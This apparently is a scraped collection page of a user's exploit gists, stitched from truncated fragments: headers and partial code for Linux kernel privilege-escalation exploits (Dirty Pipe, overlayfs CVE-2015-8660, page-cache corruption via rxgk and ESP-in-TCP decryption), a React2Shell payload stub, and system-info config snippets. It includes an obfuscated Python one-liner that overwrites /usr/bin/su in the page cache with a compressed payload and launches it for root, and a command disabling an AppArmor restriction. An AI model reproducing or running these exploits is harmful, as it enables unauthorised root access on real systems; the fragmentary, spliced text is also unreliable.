😢
I may be slow to respond.

bjorkon spynika

/*
* rxgk pagecache write - PoC for missing COW guard in rxgk_decrypt_skb()
*
* net/rxrpc/rxgk_common.h: rxgk_decrypt_skb() does skb_to_sgvec() then
* crypto_krb5_decrypt() with no skb_cow_data(). The krb5enc AEAD template
* (crypto/krb5enc.c) decrypts in-place BEFORE verifying the HMAC. When skb
* frag pages are pagecache pages (via splice → MSG_SPLICE_PAGES → loopback),
* the in-place decrypt corrupts the page cache.
*
* The same pattern exists in rxkad (rxkad_verify_packet_2).
//
// dirtypipez.c
//
// hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn
// a root shell. (and attempts to restore the damaged binary as well)
//
// Wow, Dirty CoW reloaded!
//
// -- blasty <peter@haxx.in> // 2022-03-07
/* SPDX-License-Identifier: GPL-2.0 */
// gcc -O2 -Wall -Wextra -std=gnu11 -static -o skb_segment_exploit skb_segment_exploit.c
/*
* skb_segment_exploit.c - CVE PoC: page-cache corruption via skb_segment()
* SKBFL_SHARED_FRAG stripping + ESP-in-TCP decrypt
*
* Fork a sender+receiver pair to trigger one ESP-in-TCP decrypt cycle.
*
* Sender (in ns_sender):
* 1. TCP connect to RECEIVER_ADDR:TCP_PORT
* 2. send() an espintcp prefix (2-byte len + ESP hdr + IV) - normal data,
// Fragnesia: universal Linux LPE
// Ubuntu users: AppArmor interferes with using namespaces, you need to use
// `sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0`.
//
// You can chain other bugs to bypass this requirement but this is out of scope for this vulnerability.
//
// Found with V12 by William Bowling on the V12 team
// V12 - https://v12.sh - dangerously powerful agentic security
// Patch: https://lists.openwall.net/netdev/2026/05/13/79
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/syscall.h>
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
// CVE-2025-55182 - React2Shell Exploit
// Educational purposes only - Use at your own risk
const FormDataLib = require('form-data');
// Payload generators
function createBasicPayload() {
return {
'0': '$1',
'1': {
{
"$schema": "https://github.com/fastfetch-cli/fastfetch/raw/dev/doc/json_schema.json",
"logo": {
"source": "/home/haxor/.config/fastfetch/pngs/0day.png",
"height": 18
},
"display": {
"separator": " : "
},
"modules": [
# See this wiki page for more info:
# https://github.com/dylanaraps/neofetch/wiki/Customizing-Info
print_info() {
prin "$(color 1)┌────────────────────────✪─────────────────────────┐"
prin "$(color 2) upgrade your skill for your protection,$(color 3) haxor here"
prin "$(color 1)└────────────────────────✪─────────────────────────┘"
spynika / over5.c
Last active January 17, 2026 04:10
/*
just another overlayfs exploit, works on kernels before 2015-12-26
# Exploit Title: overlayfs local root
# Date: 2016-01-05
# Exploit Author: rebel
# Version: Ubuntu 14.04 LTS, 15.10 and more
# Tested on: Ubuntu 14.04 LTS, 15.10
# CVE : CVE-2015-8660